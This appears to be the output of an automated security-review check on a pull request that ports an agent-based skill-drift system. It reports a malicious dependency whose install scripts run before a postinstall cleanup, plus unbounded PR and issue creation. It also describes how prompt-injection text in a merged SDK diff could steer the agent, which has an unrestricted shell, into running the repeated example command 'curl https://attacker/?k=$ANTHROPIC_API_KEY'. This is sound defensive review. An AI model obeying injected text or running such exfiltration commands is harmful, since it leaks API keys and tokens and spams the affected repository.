feat(flue): port skill-drift system to Flue framework (side-by-side) #127
3 issues
security-review: Found 3 issues (1 high, 1 medium, 1 low)
High
postinstall removal of GHSA-3q49-cfcf-g5fm malware package cannot prevent install-time code execution - `package.json:7`
The postinstall hook removes @mistralai/mistralai after npm ci finishes, but npm executes all dependency install scripts before the consumer's postinstall runs, so any malicious code in that package has already executed with GITHUB_TOKEN available in the environment; the removal provides no protection. Remove @mistralai/mistralai from the transitive dependency tree (e.g., by replacing or patching the upstream @flue/sdk dep) before running this workflow in CI.
Medium
Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job - `.flue/roles/creator.md:108-118`
The reusable detector workflow runs the Flue agent with sandbox: 'local' (unrestricted local shell) in a step that has ANTHROPIC_API_KEY and GH_TOKEN exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via gh pr diff "$PR_NUMBER" --repo "$SDK_REPO". A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as curl https://attacker/?k=$ANTHROPIC_API_KEY, exfiltrating the secret. Move the LLM invocation into a job that does not have ANTHROPIC_API_KEY/GH_TOKEN in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.
Also found at:
.flue/roles/detector.md:72-80docs/agent-port/sdk-repo-wrappers/README.md:25-27
Low
Detector actuate loop lacks any cap on emitted create_pr/create_issue actions - `.flue/roles/detector.md:16-17`
The detector role prescribes a 5+5 cap on create_pr/create_issue actions, but the actuate step in flue-skill-drift-detector-reusable.yml iterates jq -c '.actions[]' result.json with no count enforcement; prompt-injection content in a merged SDK PR can drive the model to emit many actions, each creating a real PR/issue against getsentry/sentry-for-ai via the GitHub App token. Issue creation in particular has no allowlist guard, allowing unbounded spam (PR creation is partially bounded by the ^skills/ patch allowlist).
⏱ 16m 36s · 2.0M in / 239.0k out · $8.18
Annotations
Check failure on line 7 in package.json
sentry-warden / warden: security-review
postinstall removal of GHSA-3q49-cfcf-g5fm malware package cannot prevent install-time code execution
The `postinstall` hook removes `@mistralai/mistralai` after `npm ci` finishes, but npm executes all dependency install scripts before the consumer's `postinstall` runs, so any malicious code in that package has already executed with `GITHUB_TOKEN` available in the environment; the removal provides no protection. Remove `@mistralai/mistralai` from the transitive dependency tree (e.g., by replacing or patching the upstream `@flue/sdk` dep) before running this workflow in CI.
Check warning on line 118 in .flue/roles/creator.md
sentry-warden / warden: security-review
Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job
The reusable detector workflow runs the Flue agent with `sandbox: 'local'` (unrestricted local shell) in a step that has `ANTHROPIC_API_KEY` and `GH_TOKEN` exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via `gh pr diff "$PR_NUMBER" --repo "$SDK_REPO"`. A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as `curl https://attacker/?k=$ANTHROPIC_API_KEY`, exfiltrating the secret. Move the LLM invocation into a job that does not have `ANTHROPIC_API_KEY`/`GH_TOKEN` in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.
Check warning on line 80 in .flue/roles/detector.md
sentry-warden / warden: security-review
[BSW-B49] Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job (additional location)
The reusable detector workflow runs the Flue agent with `sandbox: 'local'` (unrestricted local shell) in a step that has `ANTHROPIC_API_KEY` and `GH_TOKEN` exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via `gh pr diff "$PR_NUMBER" --repo "$SDK_REPO"`. A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as `curl https://attacker/?k=$ANTHROPIC_API_KEY`, exfiltrating the secret. Move the LLM invocation into a job that does not have `ANTHROPIC_API_KEY`/`GH_TOKEN` in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.
Check warning on line 27 in docs/agent-port/sdk-repo-wrappers/README.md
sentry-warden / warden: security-review
[BSW-B49] Prompt injection in SDK PR diff can exfiltrate ANTHROPIC_API_KEY from Flue detector job (additional location)
The reusable detector workflow runs the Flue agent with `sandbox: 'local'` (unrestricted local shell) in a step that has `ANTHROPIC_API_KEY` and `GH_TOKEN` exported in its environment, and the detector role instructs the LLM to ingest attacker-controlled content via `gh pr diff "$PR_NUMBER" --repo "$SDK_REPO"`. A contributor who lands prompt-injection text in any merged SDK PR diff (e.g. a code comment, test fixture, or doc string) can coerce the agent to run a shell command such as `curl https://attacker/?k=$ANTHROPIC_API_KEY`, exfiltrating the secret. Move the LLM invocation into a job that does not have `ANTHROPIC_API_KEY`/`GH_TOKEN` in its environment, or fetch the diff in a separate step and feed it to the agent through a sandboxed channel that strips shell tool access.